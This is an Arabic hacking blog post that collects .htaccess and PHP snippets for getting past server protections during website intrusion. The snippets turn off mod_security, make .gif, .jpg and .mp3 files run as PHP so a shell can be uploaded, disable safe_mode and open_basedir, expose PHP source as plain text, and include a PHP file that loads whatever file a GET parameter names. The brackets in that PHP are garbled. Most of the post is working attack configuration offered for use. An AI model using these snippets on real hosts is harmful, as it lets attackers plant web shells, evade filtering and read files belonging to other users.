الرئيسية / أدوات / تخطي جميع الحمايات ب واسطة ملف htaccess

تخطي جميع الحمايات ب واسطة ملف htaccess


السلام عليكم و رحمة اللله و بركاته 
اليوم و في هده التدوينة المتواضعة سوف نتكلم على احد اهم و ابرز الموضوغات الشيقة في عالم اختراق المواقع و الا و هي تخطي الحمايات في اختراق السيرفرات عن طريق ملف htaccess ف قمت ب جمع ابرز الكودات التي انت ب حاجة اليها في عمليات تخطي الحمايات 
تابع معي

التحكم باصدار php

كود : 

AddType application/x-httpd-php4 .php


تتغير امتداد او لاحقة php الى امتداد gif,jpg

AddType application/x-httpd-php .gif
AddType application/x-httpd-php .jpg


تحكم بcgi-s cript ولاحقاته وتشغيلها

AddHandler cgi-s cript .pp .pl .txt


تخطي الـ LiteSpeed

<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

تخطي السيف مود safe_mode بحالة Suexec

suPHP_ConfigPath /home/user/public_html/php.ini


تخطي الفور بدن Forbidden

1  

Options FollowSymLinks MultiViews Indexes ExecCGI

2

Options Indexes FollowSymLinks 
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

3


Options All
DirectoryIndex ssss.html
addType txt .php
AddHandler txt .php

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

4

Options All
ReadMeName 1.txt

5

suPHP_ConfigPath /home/user/public_html/php.ini

6

Options all
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html

7

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

تخطي انترنت سيرفر ارور  HTTP 500 Internal Server Error

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

تخطي مراكز التحميل رفع الشل باي امتداد

<FilesMatch "^.*.mp3">
SetHandler application/x-httpd-php
</FilesMatch>


تشغيل البيرل باي امتداد

AddHandler cgi-script .CH
AddHandler cgi-script .txt
AddHandler cgi-script .pp
AddHandler cgi-script .pl

تشغيل البيرل وملفات السي جي اذا كان محمي منhttp.conf ببعض اضافة لاحقاته المعروفة pl,cgi

Options ExecCGI
AddType application/x-httpd-cgi .xx
AddHandler cgi-s cript .xx

تشغيل او تعطيل register_globals

php_flag register_globals "off"

تعطيل المود السيكيورتي

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

تعطيل او تشغيل open_basedir

php_flag open_basedir "off"

تغير اصدار ال php

AddType application/x-httpd-php4 .php

سحب ملف بصلاحيه يوزر

AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html

سماح و تشغيل الكل 

Options All

عرض وسماح لملفات الاختصار symlinks

Options FollowSymLinks

و الان الشيء المهم جدا 
و هو تخطي السيف مود safe_mode

قم ب انشاء او تعديل ملف ب اسم  ini.php
و ضع هادا الكود 


echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>

و الان قم ب انشاء ملف ب اسم php.ini او ابحث عليه و قم ب التعديل عليه 
ضع هادا الكود 


safe_mode = off

تخطي SymLinks

Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php

تخطي SymLinks   بقوة 

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

في الاخير اتمنى انكم قد استفدتم من هده المدونة المتواضعة و المتعوب عليها في التجميع 😉😉😉😉

عن sohaip

شاهد أيضاً

دورة تعليم الهكر للمبتدئين مجانا 2019

يتم تعليم الهكر من قبل ناس عئواشيين على اليوتويب ، و لكن هذه المرة أقدم لكم …

تعليق واحد

  1. مدومة ما شاء الله و قد استفدنا منها الكثير و الكثير

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *